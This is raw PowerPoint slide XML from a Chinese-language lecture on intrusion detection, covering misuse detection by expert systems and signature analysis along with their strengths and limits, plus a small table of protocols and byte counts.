                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>UDP</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>TCP</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>TCP</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="179661793"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="476210">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                        <a:t>字节数</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>144</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>78</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>376</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>48</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3958203580"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B050302020402020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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B050302020402020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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>攻击特征举例</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5273414-F800-4DBB-9673-316B7D05D346}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="方正正大黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正正大黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="方正正大黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正正大黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>误用检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2441670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9C768B8E-AED4-C59F-CB67-45E0ED8F57DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1199654" y="2975369"/>
            <a:ext cx="8199755" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="12913" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FFEE54-351A-D541-1D88-AE6C307B93AB}"/>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网络行为的审计数据进行规则转换后再判定</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="组合 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD9BDD0-5946-5F6B-B812-F57888F8AE7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>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3" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD177DF3-21B0-FC7B-614C-E8C43250A66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1199654" y="2375208"/>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将已知网络入侵行为转成规则，建立专家库</a:t>
              </a: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专家系统误用检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="组合 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8193AB5-AAA7-2E49-D219-89DCB1C59259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1120800" y="3934870"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F129DA55-343D-FB6C-412B-530340E232EA}"/>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8" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B018D4-38F1-C2AB-5480-E8F1FB1EA04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1" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C118A14-C7D1-D6DA-A131-82C5F09D9E88}"/>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优势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB7C10B-5512-1782-23A0-12389C62AAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="964303" y="4771825"/>
            <a:ext cx="2868295" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="4517" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A1DA32-CCE4-7E71-E6F6-517AF929644E}"/>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适合于有特征的入侵</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55" name="组合 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F23CB99-EB51-45B7-4C7E-BDB3C49C6307}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="62" name="图片 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AE3172-1850-A34F-D6B7-89946902A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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE33040D-90DB-DB01-4B82-5FB1815CC9F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74" name="组合 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620B6FDF-4485-445A-A202-BEF0C9DBA629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5286880" y="3920674"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C08E8DC-C083-DA71-48E1-ADCB805ED79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8" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D280F5FF-01EB-D098-DBD2-DE53849B8DC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9" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7006A067-0F1D-0C2E-6D33-F47951D18B86}"/>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不足</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4827B280-32A3-D217-04D0-5CF9E1594970}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767504" y="4862519"/>
            <a:ext cx="2443836" cy="34556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处理大量的审计数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="82" name="组合 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1EF7D4-487F-2258-0271-7A7ED08487E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167429" y="4644078"/>
            <a:ext cx="873460" cy="909891"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="83" name="图片 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{816E1D9C-F724-CD0A-205F-C5E66028D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4" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C35AB0F-CDB9-AD20-A6D0-D80F6F8A4A0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sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{700ED1A9-19EB-746E-9F37-246B2FDB6AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767503" y="5425637"/>
            <a:ext cx="3476827" cy="21653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攻击行为规则化描述精度不高</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87" name="组合 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16BD625E-6C15-D260-4E4D-6C5E1D293286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="5121472"/>
            <a:ext cx="876935" cy="830580"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="88" name="图片 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0DE6C47-60C4-038C-3F92-C6942C614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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815A4F9F-6E44-FCB6-AD0D-D9347483B21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sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A06E734C-556C-58E3-3FE9-5273968BB44C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767503" y="5837150"/>
            <a:ext cx="3476827" cy="37385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只能检测已知攻击，知识库维护</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="组合 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D3D8FE-C7EC-6EEE-6365-E36C1E813657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="5618710"/>
            <a:ext cx="876935" cy="830580"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="93" name="图片 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{128A263E-93B9-E94A-42CE-293C1D9D52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4" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA9B8923-7A12-1D3F-0A38-6DB4F68CFF25}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="图片 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0A70E2-D5C5-06CC-CD5F-7D2059120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06" y="3939118"/>
            <a:ext cx="2757857" cy="1840007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDFE234-13F3-4EFC-8D49-957D51EECB5F}"/>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3607382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9C768B8E-AED4-C59F-CB67-45E0ED8F57DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1199654" y="2975369"/>
            <a:ext cx="8199755" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="12913" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FFEE54-351A-D541-1D88-AE6C307B93AB}"/>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以行为的审计数据与事件序列进行匹配</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="组合 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD9BDD0-5946-5F6B-B812-F57888F8AE7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>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3" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD177DF3-21B0-FC7B-614C-E8C43250A66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1199654" y="2375208"/>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将入侵行为表示成事件序列或数据样板</a:t>
              </a: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特征分析误用检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="组合 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8193AB5-AAA7-2E49-D219-89DCB1C59259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1120800" y="3934870"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F129DA55-343D-FB6C-412B-530340E232EA}"/>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8" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B018D4-38F1-C2AB-5480-E8F1FB1EA04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1" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C118A14-C7D1-D6DA-A131-82C5F09D9E88}"/>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优势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB7C10B-5512-1782-23A0-12389C62AAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="964303" y="4771825"/>
            <a:ext cx="2868295" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="4517" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A1DA32-CCE4-7E71-E6F6-517AF929644E}"/>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运行效率有所提高</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55" name="组合 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F23CB99-EB51-45B7-4C7E-BDB3C49C6307}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="62" name="图片 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AE3172-1850-A34F-D6B7-89946902A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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE33040D-90DB-DB01-4B82-5FB1815CC9F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74" name="组合 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620B6FDF-4485-445A-A202-BEF0C9DBA629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5286880" y="3920674"/>
            <a:ext cx="1118136" cy="734063"/>
